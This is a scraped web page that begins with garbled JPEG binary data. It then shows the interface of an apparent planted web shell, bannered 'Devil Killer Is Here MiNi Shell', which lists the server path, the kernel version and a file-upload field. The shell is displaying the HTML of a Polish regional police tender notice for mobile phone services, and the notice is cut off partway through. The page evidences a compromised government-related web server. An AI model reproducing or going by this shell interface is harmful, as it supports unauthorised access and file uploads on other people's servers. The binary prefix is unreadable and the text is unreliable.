JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180126/508917-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 508917-N-2018 z dnia 2018-01-26 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Komenda Wojewódzka Policji w Katowicach</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">ZP-2380-7/2018 Świadczenie usług telekomunikacyjnych w sieci telefonii komórkowej</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Tak</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Podmiot</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>KOMENDA WOJEWÓDZKA POLICJI W KATOWICACH 40-038 KATOWICE UL. J. LOMPY 19</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>SZKOŁA POLICJI W KATOWICACH 40-684 KATOWICE , UL. GEN. JANKEGO 276</TD></TR></TABLE> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Komenda Wojewódzka Policji w Katowicach</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27020829200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. J. Lompy</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">19</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">40038 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Katowice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">322 002 050</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia@slaska.policja.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">322 002 060</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.katowice.kwp.policja.gov.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja rządowa terenowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"> a) przygotowanie i przeprowadzenie postępowania o udzielenie zamówienia publicznego, b) powołanie komisji przetargowej, c) wybór trybu udzielenia zamówienia, d) opracowanie i zatwierdzenie Specyfikacji Istotnych Warunków Zamówienia (dalej SIWZ), e) sporządzenie i przesłanie ogłoszeń i informacji przewidzianych w ustawie Prawo Zamówień Publicznych, f) udzielanie odpowiedzi i wyjaśnień do treści SIWZ, g) podejmowanie decyzji o wykluczeniu wykonawców oraz odrzuceniu ofert, h) reprezentowanie Stron w postępowaniu przed Zespołem Arbitrów oraz w postępowaniu skargowym przed sądem, i) dokonanie wyboru najkorzystniejszej oferty lub podjęcie decyzji o unieważnieniu postępowania, j) zawarcie umowy na świadczenie usług telekomunikacyjnych w zakresie dostępu do sieci publicznej w łączności stacjonarnej oraz komórkowej dla jednostek policji w garnizonie śląskim.§2 1. Kierownicy jednostek organizacyjnych Policji ustalają, że Zamawiający przygotuje i przeprowadzi postępowanie o udzielenie zamówienia publicznego zgodnie z przepisami ustawy Prawo zamówień publicznych, na zasadach obowiązujących w kierowanej przez niego jednostce. 2. Komisję przetargową powołuje Zamawiający spośród policjantów i pracowników Komendy Wojewódzkiej Policji w Katowicach.</span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.katowice.kwp.policja.gov.pl/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.katowice.kwp.policja.gov.pl/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23.11.2012r. Prawo Pocztowe, osobiście lub za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Komenda Wojewódzka Policji w Katowicach, ul. Lompy 19, 40-038 Katowice, Zespół Zamówień Publicznych, Sekretariat blok A, parter</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">ZP-2380-7/2018 Świadczenie usług telekomunikacyjnych w sieci telefonii komórkowej</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP-2380-7/2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest: świadczenie usług telefonii komórkowej dla jednostek Policji woj. Śląskiego w ilości 4211 szt. kart SIM oraz Szkoły Policji w Katowicach w ilości 50 szt. kart SIM.Dla usług świadczonych w ramach telefonii komórkowej Wykonawca ma zapewnić co najmniej świadczenie usługi w zakresie łączności: -głosowej,-tekstowej (SMS), -multimedialnej (MMS)-dostępu do zasobów Internetu w technologii GPRS/EDGE/UMTS/HSPA+/HSPA/LTE.Realizacja usług odbywać się będzie poprzez wykorzystanie dotychczas użytkowanych i/lub dostarczonych przez Wykonawcę aktywnych kart SIM. Wykonawca zagwarantuje świadczenie dla potrzeb Zamawiającego usług aktualnie dostępnych oraz tych, które wprowadzi do powszechnego użytku w trakcie trwania umowy. 2. Szczegółowy opis przedmiotu zamówienia znajduje się w: a) załączniku nr 1 do ogłoszenia - wniosek o dopuszczenie do udziału w licytacji ; b) załączniku nr 2 do ogłoszenia - projekt umowy dla KWP c) załączniku nr 2a do ogłoszenia - projekt umowy dla SPw K d) załączniku nr 3 do ogłoszenia - opisie przedmiotu zamówienia e) załączniku nr 6 do ogłoszenia - formularz ofertowyZamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawcabędzie korzystał z podwykonawców Zamawiający żąda wskazania części zamówienia, które zamierza impowierzyć, podania nazw firm podwykonawców oraz dane kontaktowe (załącznik nr 1 do ogłoszenia).Zapisy dotyczące podwykonawców znajdują się w projekcie umowy (załącznik nr 2 i 2a do ogłoszenia). </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">64212000-5</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-03-31</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2021-03-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Dokładne terminy obowiązywania umowy zostały wskazane w projekcie umowy stanowiące załącznik nr 2 i 2a do ogłoszenia </span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"> posiadają uprawnienia do wykonywania określonej działalności tj.posiadają zaświadczenie o wpisie do rejestru przedsiębiorców telekomunikacyjnych wydawaneprzez Prezesa UKE, o którym mowa w art. 10 i art. 11 ustawy z dnia 16 lipca 2004 r. Prawotelekomunikacyjne (Dz. U. Nr 171, poz. 1800 z późn. zm.) Na potwierdzenie spełniania brakupodstaw do wykluczenia zamawiający żąda: (1) na podstawie art. 25a ust. 1 ustawy Pzp -dołączenia do oferty oświadczenia o braku podstaw do wykluczenia - zgodnie ze wzoremstanowiącym załącznik nr 4 i 5 do SIWZ; (2) Informacje dodatkowe 2. Zamawiający dokona oceny spełnienia warunków udziału wpostępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń w formie spełnia, niespełnia. Wykonawca niespełniający warunków udziału w postępowaniu zostanie wykluczonyzgodnie z art. 24 ust. 1 i/lub ust. 5 pkt. 1 ustawy Pzp. 3. Aktualność dokumentów składanych dooferty. Za aktualny zostanie uznany zarówno dokumentwystawiony odpowiednio nie wcześniej niż 3 m-ce i 6 m-cy przed upływem terminu składaniaofert, jak również dokument wystawiony w okresie wcześniejszym, jeżeli istnienie określonych wnim okoliczności potwierdzone zostanie przez właściwy organ w wymaganym terminie. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O 